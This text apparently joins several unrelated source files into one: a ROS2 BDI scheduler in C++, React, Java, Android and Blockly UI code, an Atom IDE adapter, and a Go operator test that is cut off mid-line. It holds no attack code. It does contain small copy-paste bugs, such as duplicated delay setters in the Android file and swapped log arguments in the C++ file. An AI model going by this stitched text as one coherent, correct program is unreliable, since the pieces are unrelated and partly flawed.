if(desireAchieved) delDesire(targetDesire, true);//desire achieved -> delete all desires within the same group if(planExecInfo.status == planExecInfo.SUCCESSFUL)//plan exec completed successful { if(this->get_parameter(PARAM_DEBUG).as_bool()) { string addNote = desireAchieved? "desire \"" + targetDesireName + "\" achieved will be removed from desire set" : "desire \"" + targetDesireName + "\" still not achieved! It'll not removed from the desire set yet"; RCLCPP_INFO(this->get_logger(), "Plan successfully executed: " + addNote); } } else if(planExecInfo.status == planExecInfo.ABORT && !desireAchieved)// plan exec aborted and desire not achieved { int maxPlanExecAttempts = this->get_parameter(PARAM_MAX_TRIES_EXEC_PLAN).as_int(); aborted_plan_desire_map_[targetDesireName]++; RCLCPP_INFO(this->get_logger(), "Plan execution for fulfilling desire \"" + targetDesireName + "\" has been aborted for the %d time (max attempts: %d)", aborted_plan_desire_map_[targetDesireName], maxPlanExecAttempts); if(aborted_plan_desire_map_[targetDesireName] >= maxPlanExecAttempts) { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire \"" + targetDesireName + "\" will be removed because it doesn't seem feasible to fulfill it: too many plan abortions!"); delDesire(targetDesire); }else if(!targetDesire.getContext().isSatisfied(belief_set_) && this->get_parameter(PARAM_AUTOSUBMIT_CONTEXT).as_bool()){ // check for context condition failed // (just if not already done... that's why you look into the invalid map) // plan exec could have failed cause of them: evaluate if they can be reached and submit the desire to yourself string fulfillContextDesireName = targetDesire.getName() + "_fulfill_context"; // extract a desire (if possible) for each clause in the context conditions vector<ManagedDesire> fulfillContextDesires = BDIFilter::conditionsToMGDesire(targetDesire.getContext(), fulfillContextDesireName, std::min(targetDesire.getPriority()+0.01f, 1.0f), targetDesire.getDeadline()); for(ManagedDesire fulfillContextD : fulfillContextDesires) { if(desire_set_.count(fulfillContextD) == 0 && desireAcceptanceCheck(fulfillContextD) == ACCEPTED) { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Context conditions are not satisfied for desire \"" + targetDesire.getName() + "\" but could be satisfied: " + + " auto-submission desire \"" + fulfillContextD.getName() + "\""); fulfillContextD.setParent(targetDesire);//set md as its parent desire addDesire(fulfillContextD, targetDesire, "_context"); } } } // if not reached max exec attempt, for now mantain the desire // if not valid anymore, it'll be eventually removed in next reschedulings, // otherwise the plan will be commissioned again until reaching maxPlanExecAttempts } mtx_iter_dset_.unlock(); current_plan_ = ManagedPlan{};//no current plan in execution reschedule(); //next reschedule(); will select a new plan if computable for a desire in desire set } } } /* Given the current knowledge of the belief set, decide if a given desire is already fulfilled */ bool Scheduler::isDesireSatisfied(ManagedDesire& md) { return md.isFulfilled(belief_set_); } /* Use the updated belief set for deciding if some desires are pointless to pursue given the current beliefs which shows they're already fulfilled */ void Scheduler::checkForSatisfiedDesires() { mtx_iter_dset_.lock();//to sync between iteration in checkForSatisfiedDesires() && reschedule() vector<ManagedDesire> satisfiedDesires; for(ManagedDesire md : desire_set_) { if(isDesireSatisfied(md))//desire already achieved, remove it { if(!noPlanSelected() && current_plan_.getDesire() == md && current_plan_exec_info_.status == current_plan_exec_info_.RUNNING && current_plan_exec_info_.executing.size() > 0 && !executingLastAction()) { int lastActionIndex = current_plan_exec_info_.actions.size() -1; int executingActionIndex = -1; for(auto exec_action : current_plan_exec_info_.executing) executingActionIndex = std::max((int)exec_action.index, executingActionIndex); if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Current plan execution fulfilling desire \"" + md.getName() + "\" will be aborted since desire is already fulfilled and plan exec. is still far from being completed " + "(executing %d out of %d)", lastActionIndex, executingActionIndex); //abort current_plan_ plan execution since current target desire is already achieved and you're far from completing the plan (missing more than last action) abortCurrentPlanExecution(); } else { if(this->get_parameter(PARAM_DEBUG).as_bool()) RCLCPP_INFO(this->get_logger(), "Desire \"" + md.getName() + "\" will be removed from the desire set since its "+ "target appears to be already fulfilled given the current belief set"); satisfiedDesires.push_back(md);//delete desire just if not executing one, otherwise will be deleted when aborted feedback comes and desire is satisfied } } } for(ManagedDesire md : satisfiedDesires)//delete all satisfied desires from desire set delDesire(md, true);//you're deleting satisfied desires -> delete all the ones in the same group mtx_iter_dset_.unlock();//to sync between iteration in checkForSatisfiedDesires() && reschedule() } /* wrt the current plan execution... return true iff currently executing last action return false if otherwise or not executing any plan */ bool Scheduler::executingLastAction() { // not exeuting any plan or last update not related to currently triggered plan if(noPlanSelected() || current_plan_exec_info_.target.name != current_plan_.getDesire().getName()) return false; bool executingLast = false; for(auto currentExecutingAction : current_plan_exec_info_.executing) if(currentExecutingAction.index == current_plan_exec_info_.actions.size() - 1)//currentlyExecutingLast action executingLast = true; return executingLast; } /* The belief set has been updated */ void Scheduler::updatedBeliefSet(const BeliefSet::SharedPtr msg) { set<ManagedBelief> newBeliefSet = BDIFilter::extractMGBeliefs(msg->value); bool bsetModified = false;//is belief set altered from last update? for(ManagedBelief mb : newBeliefSet) if(belief_set_.count(mb) == 0)//check if new belief set has new items { bsetModified = true; break; } if(!bsetModified) for(ManagedBelief mb : belief_set_) if(newBeliefSet.count(mb) == 0)//check if new belief set has lost a few items { bsetModified = true; break; } if(bsetModified)//if belief set appears different from last update { belief_set_ = newBeliefSet;//update current mirroring of the belief set checkForSatisfiedDesires();//check for satisfied desires reschedule();//do a rescheduling } } /* Someone has publish a new desire to be fulfilled in the respective topic */ void Scheduler::addDesireTopicCallBack(const Desire::SharedPtr msg) { bool added = addDesire(ManagedDesire{(*msg)}); if(added)//addition done { publishDesireSet(); checkForSatisfiedDesires();// check for desire to be already fulfilled if(desire_set_.size() > 0 && noPlanSelected())// still there to be satisfied && no plan selected, rescheduled immediately reschedule(); } } /* Someone has publish a desire to be removed from the one to be fulfilled (if present) in the respective topic */ void Scheduler::delDesireTopicCallBack(const Desire::SharedPtr msg) { bool deleted = delDesire(ManagedDesire{(*msg)}); if(deleted) { publishDesireSet(); if(ManagedDesire{(*msg)} == current_plan_.getDesire())//deleted desire of current executing plan) abortCurrentPlanExecution();//abort current plan execution } } /* Wrapper for calling addDesire with just desire to added (where not linked to any other desires) N.B see addDesire(const ManagedDesire mdAdd, const optional<ManagedDesire> necessaryForMd) for further explanations */ bool Scheduler::addDesire(const ManagedDesire mdAdd) { return addDesire(mdAdd, std::nullopt, ""); } /* Add desire @mdAdd to desire_set_ (if there is not yet) add counters for invalid desire and aborted plan in respective maps (both init to zero) @necessaryForMd is another ManagedDesire which can be present if @mdAdd is necessary for the fulfillment of it (e.g. @mdAdd is derived from preconditions or context) @necessaryForMd value (if exists) has to be already in the desire_set_ */ bool Scheduler::addDesire(ManagedDesire mdAdd, optional<ManagedDesire> necessaryForMD, const string& suffixDesireGroup) { auto acceptance = desireAcceptanceCheck(mdAdd); if(acceptance != ACCEPTED && acceptance != UNKNOWN_INSTANCES)//unknown predicates values / syntax_errors within target beliefs return false; bool added = false; mtx_add_del_.lock(); added = addDesireCS(mdAdd, necessaryForMD, suffixDesireGroup); mtx_add_del_.unlock(); return added; } /* Add desire Critical Section (to be executed AFTER having acquired mtx_add_del_.lock()) Add desire @mdAdd to desire_set_ (if there is not yet) add counters for invalid desire and aborted plan in respective maps (both init to zero) @necessaryForMd is another ManagedDesire which can be present if @mdAdd is necessary for the fulfillment of it (e.g. @mdAdd is derived from preconditions or context) @necessaryForMd value (if exists) has to be already in the desire_set_ */ bool Scheduler::addDesireCS(ManagedDesire mdAdd, optional<ManagedDesire> necessaryForMD, const string& suffixDesireGroup) { if(mtx_add_del_.try_lock()) { //if acquired, it means we were not in CS, release it and return false -> operation not valid mtx_add_del_.unlock(); return false; } bool added = false; if(computed_plan_desire_map_.count(mdAdd.getName())==0 && aborted_plan_desire_map_.count(mdAdd.getName())==0 && desire_set_.count(mdAdd)==0)//desire already there (or diff. desire but with same name identifier) { if(necessaryForMD.has_value() && desire_set_.count(necessaryForMD.value())==1) { // @mdAdd linked to another MGdesire for which it is necessary in order to grant its execution // put as @mdAdd's group mdAdd.name + suffix (suffix can be "_precondition"/"_context") mdAdd.setDesireGroup(necessaryForMD.value().getName() + suffixDesireGroup); } desire_set_.insert(mdAdd); computed_plan_desire_map_.insert(std::pair<string, int>(mdAdd.getName(), 0));//to count invalid goal computations and discard after x aborted_plan_desire_map_.insert(std::pair<string, int>(mdAdd.getName(), 0));//to count invalid goal computations and discard after x added = true; } return added; } /* Wrapper for delDesire with two args */ bool Scheduler::delDesire(const ManagedDesire mdDel) { return delDesire(mdDel, false);//do not delete desires within the same group of mdDel } /* Del desire from desire_set if present (Access through lock!) */ bool Scheduler::delDesire(const ManagedDesire mdDel, const bool& wipeSameGroup) { bool deleted = false; mtx_add_del_.lock(); deleted = delDesireCS(mdDel, wipeSameGroup); mtx_add_del_.unlock(); return deleted; } /* Del desire from desire_set CRITICAL SECTION (to be called after having acquired mtx_add_del_ lock) In Addition Deleting atomically all the desires within the same desire group if @wipeSameGroup equals to true */ bool Scheduler::delDesireCS(const ManagedDesire mdDel, const bool& wipeSameGroup) { if(mtx_add_del_.try_lock()) { //if acquired, it means we were not in CS, release it and return false -> operation not valid mtx_add_del_.unlock(); return false; } bool deleted = false; //erase values from desires map if(computed_plan_desire_map_.count(mdDel.getName()) > 0) computed_plan_desire_map_.erase(mdDel.getName()); if(aborted_plan_desire_map_.count(mdDel.getName()) > 0) aborted_plan_desire_map_.erase(mdDel.getName()); if(desire_set_.count(mdDel)!=0) { desire_set_.erase(desire_set_.find(mdDel)); computed_plan_desire_map_.erase(mdDel.getName()); deleted = true; //RCLCPP_INFO(this->get_logger(), "Desire \"" + mdDel.getName() + "\" removed!");//TODO remove when assured there is no bug in deletion }/*else RCLCPP_INFO(this->get_logger(), "Desire \"" + mdDel.getName() + "\" to be removed NOT found!");*/ if(wipeSameGroup && mdDel.hasParent()) // desire being part of a group where you need to satisfy just one delDesireInGroupCS(mdDel.getDesireGroup()); // delete others in the same group return deleted; } /* Del desire group from desire_set CRITICAL SECTION (to be called after having acquired mtx_add_del_ lock) Deleting atomically all the desires within the same desire group */ void Scheduler::delDesireInGroupCS(const string& desireGroup) { vector<ManagedDesire> toBeDiscarded; for(ManagedDesire md : desire_set_) if(md.getDesireGroup() == desireGroup) toBeDiscarded.push_back(md); for(ManagedDesire md : toBeDiscarded) delDesireCS(md, false);//you're already iterating over all the desires within the same group } int main(int argc, char ** argv) { rclcpp::init(argc, argv); auto node = std::make_shared<Scheduler>(); node->wait_psys2_boot(std::chrono::seconds(8));//Wait max 8 seconds for plansys2 to boot node->init(); rclcpp::spin(node); rclcpp::shutdown(); return 0; }
import React, { ReactNode, useEffect, useState } from 'react'; import {createContext} from 'react'; let countdownTimeout: NodeJS.Timeout; interface CountedownContextData{ seconds: number; minutes: number; isActive:boolean; hasFinished:boolean; handleCountedown:()=>void; resetCountedown:()=>void; } interface CountedownProviderProps{ children:ReactNode; } export const countedownContext = createContext({} as CountedownContextData); export default function CountedownProvider ({children}:CountedownProviderProps){ const [time,setTime] = useState(Math.floor(25*60)); const[isActive,setIsActive] = useState(false); const[hasFinished, setHasFinished] = useState(false); const minutes = Math.floor(time/60); const seconds = Math.floor(time%60); function handleCountedown(){ setIsActive(!isActive); } function resetCountedown(){ clearTimeout(countdownTimeout); setTime(Math.floor(0.017*60)); setIsActive(false); setHasFinished(false); } useEffect(() =>{ if(isActive && time > 0){ countdownTimeout = setTimeout(() =>{ setTime(time - 1); },1000); }else if(isActive && time == 0){ setHasFinished(true); } },[isActive,time]); return( <countedownContext.Provider value={{ seconds, minutes, isActive, hasFinished, handleCountedown, resetCountedown }} > {children} </countedownContext.Provider> ); }
// not for light-weight things like returning the player name. private void lazilyLoadGamerStub() { if (theClojureGamer == null) { try { RT.loadResourceScript(getClojureGamerFile() + ".clj"); Var gamerVar = RT.var("gamer_namespace", getClojureGamerName()); theClojureGamer = (Gamer)gamerVar.invoke(); } catch(Exception e) { GamerLogger.logError("GamePlayer", "Caught exception in Clojure initialization:"); GamerLogger.logStackTrace("GamePlayer", e); } } }
/** * Add animated views to the superview so that it can animate them */ @Override public void addAnimatedViews() { AnimatedView frameAnimatedView = new AnimatedView(findViewById(R.id.picture_frame), 0, 0, AnimType.ALPHA, 2); frameAnimatedView.setStartDelay(0); frameAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView tropicalBackgroundAnimatedView = new AnimatedView(findViewById(R.id.tropical_background), 0, 0, AnimType.ALPHA, 2); tropicalBackgroundAnimatedView.setStartDelay(0); tropicalBackgroundAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView backButtonAnimatedView = new AnimatedView(findViewById(R.id.back_button), 0, 0, AnimType.ALPHA, 2); backButtonAnimatedView.setStartDelay(0); backButtonAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView listAnimatedView = new AnimatedView(findViewById(R.id.listView), 0, 0, AnimType.RESIZE_HEIGHT, 2); listAnimatedView.setStartDelay(Constants.ANIMATION_DURATION / 2); listAnimatedView.setEndDelay(0); AnimatedView dividerAnimatedView = new AnimatedView(findViewById(R.id.divider), 0, 0, AnimType.ALPHA, 2); dividerAnimatedView.setStartDelay(0); dividerAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); AnimatedView addFavoriteAnimatedView = new AnimatedView(findViewById(R.id.add_favorite), 0, 0, AnimType.ALPHA, 2); dividerAnimatedView.setStartDelay(0); dividerAnimatedView.setEndDelay(Constants.ANIMATION_DURATION / 2); animatedViews.add(frameAnimatedView); animatedViews.add(tropicalBackgroundAnimatedView); animatedViews.add(backButtonAnimatedView); animatedViews.add(listAnimatedView); animatedViews.add(dividerAnimatedView); animatedViews.add(addFavoriteAnimatedView); }
/** * Base factory class responsible for creating all the {@link BlockView}s, {@link InputView}s, and * {@link FieldView}s for a given block representation. Complete view trees are constructed via * calls to {@link #buildBlockGroupTree} or {@link #buildBlockViewTree}. * <p/> * Subclasses must override {@link #buildBlockView}, {@link #buildInputView}, and * {@link #buildFieldView}. They may also override {@link #buildBlockGroup()}, to provide customized * implementations to the container view. */ public abstract class BlockViewFactory<BlockView extends com.google.blockly.android.ui.BlockView, InputView extends com.google.blockly.android.ui.InputView> { /** * Context for creating or loading views. */ protected Context mContext; /** * Helper for doing conversions and style lookups. */ protected WorkspaceHelper mHelper; /** * Name manager for the list of variables in this instance of Blockly. */ protected NameManager mVariableNameManager; /** * The callback to use for views that can request changes to the list of variables. */ protected VariableRequestCallback mVariableCallback; private SpinnerAdapter mVariableAdapter; // TODO(#137): Move to ViewPool class. protected final Map<String,WeakReference<BlockView>> mBlockIdToView = Collections.synchronizedMap(new HashMap<String, WeakReference<BlockView>>()); protected BlockViewFactory(Context context, WorkspaceHelper helper) { mContext = context; mHelper = helper; helper.setBlockViewFactory(this); } /** * Sets the callback to use for variable view events, such as the user selected delete/rename. * * @param callback The callback to set on variable field views. */ public void setVariableRequestCallback(VariableRequestCallback callback) { mVariableCallback = callback; } public WorkspaceHelper getWorkspaceHelper() { return mHelper; } /** * Set the {@link NameManager} being used to track variables in the workspace. * * @param variableNameManager The name manager for the variables in the associated workspace. */ public void setVariableNameManager(NameManager variableNameManager) { mVariableNameManager = variableNameManager; } /** * Creates a {@link BlockGroup} for the given block and its children using the workspace's * default style. * * @param rootBlock The root block to generate a view for. * @param connectionManager The {@link ConnectionManager} to update when moving connections. * @param touchHandler The {@link BlockTouchHandler} to manage all touches. * * @return A view for the block. */ public final BlockGroup buildBlockGroupTree(Block rootBlock, ConnectionManager connectionManager, BlockTouchHandler touchHandler) { BlockGroup bg = buildBlockGroup(); buildBlockViewTree(rootBlock, bg, connectionManager, touchHandler); return bg; } /** * Called to construct the complete hierarchy of views representing a {@link Block} and its * subcomponents, added to {@code parentGroup}. * * @param block The root block to generate a view for. * @param parentGroup T * @param connectionManager The {@link ConnectionManager} to update when moving connections. * @param touchHandler The {@link BlockTouchHandler} to manage all touches. * * @return A view for the block and all its descendants. */ public final BlockView buildBlockViewTree(Block block, BlockGroup parentGroup, ConnectionManager connectionManager, BlockTouchHandler touchHandler) { BlockView blockView = getView(block); if (blockView != null) { throw new IllegalStateException("BlockView already created."); } List<Input> inputs = block.getInputs(); final int inputCount = inputs.size(); List<InputView> inputViews = new ArrayList<>(inputCount); for (int i = 0; i < inputCount; i++) { Input input = inputs.get(i); List<Field> fields = input.getFields(); List<FieldView> fieldViews = new ArrayList<>(fields.size()); for (int j = 0; j < fields.size(); j++) { fieldViews.add(buildFieldView(fields.get(j))); } InputView inputView = buildInputView(input, fieldViews); if (input.getType() != Input.TYPE_DUMMY) { Block targetBlock = input.getConnection().getTargetBlock(); if (targetBlock != null) { // Blocks connected to inputs live in their own BlockGroups. BlockGroup subgroup = buildBlockGroupTree( targetBlock, connectionManager, touchHandler); inputView.setConnectedBlockGroup(subgroup); } } inputViews.add(inputView); } blockView = buildBlockView(block, inputViews, connectionManager, touchHandler); // TODO(#137): Move to ViewPool class. mBlockIdToView.put(block.getId(), new WeakReference<BlockView>(blockView)); parentGroup.addView((View) blockView); Block next = block.getNextBlock(); if (next != null) { // Next blocks live in the same BlockGroup. buildBlockViewTree(next, parentGroup, connectionManager, touchHandler); // Recursively calls buildBlockViewTree(..) for the rest of the sequence. } return blockView; } /** * This returns the view constructed to represent a {@link Block}. Each block is only allowed * one view instance among the views managed by this factory (including * {@link WorkspaceFragment}, {@link ToolboxFragment}, and {@link TrashFragment}). Views are * constructed in {@link #buildBlockViewTree}, either directly or via recursion. If the block * view has not been constructed, this method will return null. * <p/> * Calling {@link BlockView#unlinkModel()} (possibly via {@link BlockGroup#unlinkModel()}) will * disconnect this view from its model, and will it no longer be returned from this method. * * @param block The {@link Block} to get the view for. * @return The previously constructed and active view of {@code block}. Otherwise null. */ @Nullable public final BlockView getView(Block block) { WeakReference<BlockView> viewRef = mBlockIdToView.get(block.getId()); return viewRef == null ? null : viewRef.get(); } /** * @return A new, empty {@link BlockGroup} container view for a sequence of blocks. */ public BlockGroup buildBlockGroup() { return new BlockGroup(mContext, mHelper); } /** * Build and populate the {@link BlockView} for {@code block}, using the provided * {@link InputView}s. * <p/> * This method should not recurse the model to generate more than one view. * {@link #buildBlockViewTree} will traverse the model and call this method for each * {@link Block}. * * @param block The {@link Block} to build a view for. * @param inputViews The list of {@link com.google.blockly.android.ui.InputView}s in this block. * @param connectionManager The {@link ConnectionManager} for the {@link Workspace}. * @param touchHandler The {@link BlockTouchHandler} this view should start with. * @return The new {@link com.google.blockly.android.ui.BlockView}. */ protected abstract BlockView buildBlockView(Block block, List<InputView> inputViews, ConnectionManager connectionManager, BlockTouchHandler touchHandler); /** * Build and populate the {@link InputView} for {@code input}. * <p/> * This method should not recurse the model to generate more than one view. * {@link #buildBlockViewTree} will traverse the model and call this method for each * {@link Input}. * * @param input The {@link Input} to build a view for. * @param fieldViews The list of {@link FieldView}s in the constructed view. * @return The new {@link com.google.blockly.android.ui.InputView}. */ protected abstract InputView buildInputView(Input input, List<FieldView> fieldViews); /** * Build and populate the {@link FieldView} for {@code field}. * <p> * Note: Variables need some extra setup when they are created by a custom * ViewFactory. * <ul> * <li>If they use an adapter to display the list of variables it must be set.</li> * <li>If they have delete/rename/create options they must have a * {@link VariableRequestCallback} set on them. {@link #mVariableCallback} may be used for * this purpose.</li> * </ul> * * * @param field The {@link Field} to build a view for. * @return The new {@link FieldView}. */ protected FieldView buildFieldView(Field field) { @Field.FieldType int type = field.getType(); switch (type) { case Field.TYPE_ANGLE: { BasicFieldAngleView fieldAngleView = new BasicFieldAngleView(mContext); fieldAngleView.setField((FieldAngle) field); return fieldAngleView; } case Field.TYPE_CHECKBOX: { BasicFieldCheckboxView fieldCheckboxView = new BasicFieldCheckboxView(mContext); fieldCheckboxView.setField((FieldCheckbox) field); return fieldCheckboxView; } case Field.TYPE_COLOR: { BasicFieldColorView fieldColorView = new BasicFieldColorView(mContext); fieldColorView.setField((FieldColor) field); return fieldColorView; } case Field.TYPE_DATE: { BasicFieldDateView fieldDateView = new BasicFieldDateView(mContext); fieldDateView.setField((FieldDate) field); return fieldDateView; } case Field.TYPE_DROPDOWN: { BasicFieldDropdownView fieldDropdownView = new BasicFieldDropdownView(mContext); fieldDropdownView.setField((FieldDropdown) field); return fieldDropdownView; } case Field.TYPE_IMAGE: { BasicFieldImageView fieldImageView = new BasicFieldImageView(mContext); fieldImageView.setField((FieldImage) field); return fieldImageView; } case Field.TYPE_INPUT: { BasicFieldInputView fieldInputView = new BasicFieldInputView(mContext); fieldInputView.setField((FieldInput) field); return fieldInputView; } case Field.TYPE_LABEL: { BasicFieldLabelView fieldLabelView = new BasicFieldLabelView(mContext); fieldLabelView.setField((FieldLabel) field); return fieldLabelView; } case Field.TYPE_VARIABLE: { BasicFieldVariableView fieldVariableView = new BasicFieldVariableView(mContext); fieldVariableView.setAdapter(getVariableAdapter()); fieldVariableView.setField((FieldVariable) field); fieldVariableView.setVariableRequestCallback(mVariableCallback); return fieldVariableView; } case Field.TYPE_NUMBER: { BasicFieldNumberView fieldNumberView = new BasicFieldNumberView(mContext); fieldNumberView.setField((FieldNumber) field); return fieldNumberView; } case Field.TYPE_UNKNOWN: default: throw new IllegalArgumentException("Unknown Field type: " + type); } } protected SpinnerAdapter getVariableAdapter() { if (mVariableNameManager == null) { throw new IllegalStateException("NameManager must be set before variable field is " + "instantiated."); } if (mVariableAdapter == null) { mVariableAdapter = new BasicFieldVariableView.VariableViewAdapter(mContext, mVariableNameManager, android.R.layout.simple_spinner_item); } return mVariableAdapter; } /** * Removes the mapping to this view from its block. This should only be called from * {@link BlockView#unlinkModel()}, which is already handled in {@link AbstractBlockView}. * * @param blockView The BlockView to disassociate from its Block model. */ // TODO(#137): Move to ViewPool class. protected final void unregisterView(BlockView blockView) { Block block = blockView.getBlock(); mBlockIdToView.remove(block.getId()); } }
import { remapAndPrintError } from "../source-map-support"; try { require('./parse'); } catch (err) { remapAndPrintError(err); }
import * as atomIde from 'atom-ide'; import Convert from '../convert'; import Utils from '../utils'; import { LanguageClientConnection, Location, ServerCapabilities, } from '../languageclient'; import { Point, TextEditor, Range, } from 'atom'; // Public: Adapts the language server definition provider to the // Atom IDE UI Definitions package for 'Go To Definition' functionality. export default class DefinitionAdapter { // Public: Determine whether this adapter can be used to adapt a language server // based on the serverCapabilities matrix containing a definitionProvider. // // * `serverCapabilities` The {ServerCapabilities} of the language server to consider. // // Returns a {Boolean} indicating adapter can adapt the server based on the // given serverCapabilities. public static canAdapt(serverCapabilities: ServerCapabilities): boolean { return serverCapabilities.definitionProvider === true; } // Public: Get the definitions for a symbol at a given {Point} within a // {TextEditor} including optionally highlighting all other references // within the document if the langauge server also supports highlighting. // // * `connection` A {LanguageClientConnection} to the language server that will provide definitions and highlights. // * `serverCapabilities` The {ServerCapabilities} of the language server that will be used. // * `languageName` The name of the programming language. // * `editor` The Atom {TextEditor} containing the symbol and potential highlights. // * `point` The Atom {Point} containing the position of the text that represents the symbol // for which the definition and highlights should be provided. // // Returns a {Promise} indicating adapter can adapt the server based on the // given serverCapabilities. public async getDefinition( connection: LanguageClientConnection, serverCapabilities: ServerCapabilities, languageName: string, editor: TextEditor, point: Point, ): Promise<atomIde.DefinitionQueryResult | null> { const documentPositionParams = Convert.editorToTextDocumentPositionParams(editor, point); const definitionLocations = DefinitionAdapter.normalizeLocations( await connection.gotoDefinition(documentPositionParams), ); if (definitionLocations == null || definitionLocations.length === 0) { return null; } let queryRange; if (serverCapabilities.documentHighlightProvider) { const highlights = await connection.documentHighlight(documentPositionParams); if (highlights != null && highlights.length > 0) { queryRange = highlights.map((h) => Convert.lsRangeToAtomRange(h.range)); } } return { queryRange: queryRange || [Utils.getWordAtPosition(editor, point)], definitions: DefinitionAdapter.convertLocationsToDefinitions(definitionLocations, languageName), }; } // Public: Normalize the locations so a single {Location} becomes an {Array} of just // one. The language server protocol return either as the protocol evolved between v1 and v2. // // * `locationResult` either a single {Location} object or an {Array} of {Locations} // // Returns an {Array} of {Location}s or {null} if the locationResult was null. public static normalizeLocations(locationResult: Location | Location[]): Location[] | null { if (locationResult == null) { return null; } return (Array.isArray(locationResult) ? locationResult : [locationResult]).filter((d) => d.range.start != null); } // Public: Convert an {Array} of {Location} objects into an Array of {Definition}s. // // * `locations` An {Array} of {Location} objects to be converted. // * `languageName` The name of the language these objects are written in. // // Returns an {Array} of {Definition}s that represented the converted {Location}s. public static convertLocationsToDefinitions(locations: Location[], languageName: string): atomIde.Definition[] { return locations.map((d) => ({ path: Convert.uriToPath(d.uri), position: Convert.positionToPoint(d.range.start), range: Range.fromObject(Convert.lsRangeToAtomRange(d.range)), language: languageName, })); } }
/* Copyright 2018 Pressinfra SRL Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // nolint: errcheck package orchestrator import ( "fmt" "math/rand" "time" . "github.com/onsi/ginkgo" . "github.com/onsi/gomega" . "github.com/onsi/gomega/gstruct" gomegatypes "github.com/onsi/gomega/types" "golang.org/x/net/context" corev1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/types" "sigs.k8s.io/controller-runtime/pkg/client" "sigs.k8s.io/controller-runtime/pkg/manager" "sigs.k8s.io/controller-runtime/pkg/reconcile" api "github.com/presslabs/mysql-operator/pkg/apis/mysql/v1alpha1" "github.com/presslabs/mysql-operator/pkg/controller/internal/testutil" "github.com/presslabs/mysql-operator/pkg/internal/mysqlcluster" orc "github.com/presslabs/mysql-operator/pkg/orchestrator" fakeOrc "github.com/presslabs/mysql-operator/pkg/orchestrator/fake" ) var ( one = int32(1) two = int32(2) three = int32(3) ) var _ = Describe("Orchestrator controller", func() { var ( // channel for incoming reconcile requests requests chan reconcile.Request // stop channel for controller manager stop chan struct{} // controller k8s client c client.Client // orchestrator fake client orcClient *fakeOrc.OrcFakeClient //timeouts noReconcileTime time.Duration reconcileTimeout time.Duration ) BeforeEach(func() { orcClient = fakeOrc.New() // noReconcileTime + reconcileTimeout > reconcileTimePeriod so that in this time period only one reconcile happens. // noReconcileTime represents time required to pass without a reconcile happening (used with Consistently tests) // it is set to 90% of the reconcileTimePeriod noReconcileTime = reconcileTimePeriod * 95 / 100 // reconcileTimeout represents time to wait AFTER noReconcileTimeout has passed for a reconciliation to happen reconcileTimeout = 10 * (reconcileTimePeriod - noReconcileTime) var recFn reconcile.Reconciler mgr, err := manager.New(cfg, manager.Options{}) Expect(err).NotTo(HaveOccurred()) c = mgr.GetClient() recFn, requests = testutil.SetupTestReconcile(newReconciler(mgr, orcClient)) Expect(add(mgr, recFn)).To(Succeed()) stop = testutil.StartTestManager(mgr) }) AfterEach(func() { time.Sleep(1 * time.Second) close(stop) }) Describe("after creating a new mysql cluster", func() { var ( expectedRequest reconcile.Request cluster *mysqlcluster.MysqlCluster secret *corev1.Secret clusterKey types.NamespacedName ) BeforeEach(func() { clusterKey = types.NamespacedName{ Name: fmt.Sprintf("cluster-%d", rand.Int31()), Namespace: "default", } expectedRequest = reconcile.Request{ NamespacedName: clusterKey, } secret = &corev1.Secret{ ObjectMeta: metav1.ObjectMeta{Name: "the-secret", Namespace: clusterKey.Namespace}, StringData: map[string]string{ "ROOT_PASSWORD": "<PASSWORD>", }, } cluster = mysqlcluster.New(&api.MysqlCluster{ ObjectMeta: metav1.ObjectMeta{ Name: clusterKey.Name, Namespace: clusterKey.Namespace, }, Spec: api.MysqlClusterSpec{ // use .replicas as nil for testing propose // Replicas: &one, SecretName: secret.Name, }, }) By("creating a new cluster") Expect(c.Create(context.TODO(), secret)).To(Succeed()) Expect(c.Create(context.TODO(), cluster.Unwrap())).To(Succeed()) // update ready nodes cluster.Status.ReadyNodes = 1 Expect(c.Status().Update(context.TODO(), cluster.Unwrap())).To(Succeed()) By("wait for a first reconcile event") // this is a synchronization event Eventually(requests, 4*time.Second).Should(Receive(Equal(expectedRequest))) }) AfterEach(func() { // manually delete all created resources because GC isn't enabled in // the test controller plane Expect(c.Delete(context.TODO(), secret)).To(Succeed()) // remove finalizers and delete the cluster c.Get(context.TODO(), clusterKey, cluster.Unwrap()) cluster.Finalizers = nil c.Update(context.TODO(), cluster.Unwrap()) c.Delete(context.TODO(), cluster.Unwrap()) }) It("should trigger reconciliation after noReconcileTime", func() { // expect to not receive any event when a cluster is created, but // just after reconcile time passed then receive a reconcile event Consistently(requests, noReconcileTime).ShouldNot(Receive(Equal(expectedRequest))) // wait for the second request Eventually(requests, reconcileTimeout).Should(Receive(Equal(expectedRequest))) }) It("should re-register cluster for orchestrator sync when re-starting the controller", func() { // restart the controller close(stop) var recFn reconcile.Reconciler mgr, err := manager.New(cfg, manager.Options{}) Expect(err).NotTo(HaveOccurred()) c = mgr.GetClient() recFn, requests = testutil.SetupTestReconcile(newReconciler(mgr, orcClient)) Expect(add(mgr, recFn)).To(Succeed()) stop = testutil.StartTestManager(mgr) // wait a second for a request Consistently(requests, noReconcileTime).ShouldNot(Receive(Equal(expectedRequest))) Eventually(requests, reconcileTimeout).Should(Receive(Equal(expectedRequest))) }) It("should unregister cluster when deleting it from kubernetes", func() { // delete the cluster Expect(c.Delete(context.TODO(), cluster.Unwrap())).To(Succeed()) // wait few seconds for a request, in total, noReconcileTime + reconcileTimeout, // to catch a reconcile event. This is the request // that unregister cluster from orchestrator By("unregister nodes from orchestrator") Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) _, err := 